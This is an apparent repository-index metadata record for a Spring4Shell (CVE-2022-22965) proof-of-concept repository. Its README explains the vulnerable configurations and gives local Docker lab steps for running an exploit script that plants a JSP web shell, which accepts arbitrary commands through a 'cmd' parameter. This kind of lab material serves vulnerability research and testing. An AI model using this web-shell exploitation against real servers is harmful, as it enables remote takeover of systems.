{"id":19062088,"url":"https://github.com/netcode/spring4shell-cve-2022-22965-poc","last_synced_at":"2025-04-24T07:49:02.529Z","repository":{"id":145058723,"uuid":"477858835","full_name":"netcode/Spring4shell-CVE-2022-22965-POC","owner":"netcode","description":"Another spring4shell (Spring core RCE)  POC","archived":false,"fork":false,"pushed_at":"2022-04-04T21:11:13.000Z","size":467,"stargazers_count":3,"open_issues_count":0,"forks_count":3,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-30T08:11:18.305Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/netcode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-04-04T20:16:06.000Z","updated_at":"2023-03-04T05:36:26.000Z","dependencies_parsed_at":null,"dependency_job_id":"37eef84d-e4ed-4050-b1d5-013c230e2be8","html_url":"https://github.com/netcode/Spring4shell-CVE-2022-22965-POC","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/netcode%2FSpring4shell-CVE-2022-22965-POC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/netcode%2FSpring4shell-CVE-2022-22965-POC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/netcode%2FSpring4shell-CVE-2022-22965-POC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/netcode%2FSpring4shell-CVE-2022-22965-POC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/netcode","download_url":"https://codeload.github.com/netcode/Spring4shell-CVE-2022-22965-POC/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250587993,"owners_count":21454921,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-09T00:24:27.229Z","updated_at":"2025-04-24T07:49:02.521Z","avatar_url":"https://github.com/netcode.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Spring4shell RCE vulnerability\n\nThis vulnerability affects Spring Core and allows an attacker to send a specially crafted HTTP request to bypass protections in the library’s HTTP request parser, leading to remote code execution.\n\nMore info [Here](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n\n![](./screenshot.png)\n\nIn order for this vulnerability to be exploited, several conditions must be met\n* Use JDK 9 or higher\n* Have Apache Tomcat as the servlet container\n* Be packaged as a traditional WAR (in contrast to a Spring Boot executable jar)\n* Use the spring-webmvc or spring-webflux dependency\n* Use Spring framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, or older versions\n\n\n\n\n# POC\n\n* Build the docker image\n\n```\ndocker build . -t springshell-rce-poc\n```\n\n* Run the docker container\n\n```\ndocker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc\n```\n\n\n* Running the exploit\n\n```\npython exploit-poc.py --url \"http://127.0.0.1:8081/\"\n```\nThe expected response\n\n```\nexploiting\nShell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j\u0026cmd=whoami\n```\n\nIf you accessed this url, it will run whatever command you want `cmd=\u003cwhatyouwant\u003e`\n\n![](./exploit.png)\n\nIf you ssh the container you will see a new file has been created `tomcatwar.jsp`\n\n```\ndocker exec -it springshell-rce-poc /bin/bash\nls /usr/local/tomcat/webapps/ROOT\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnetcode%2Fspring4shell-cve-2022-22965-poc","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnetcode%2Fspring4shell-cve-2022-22965-poc","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnetcode%2Fspring4shell-cve-2022-22965-poc/lists"}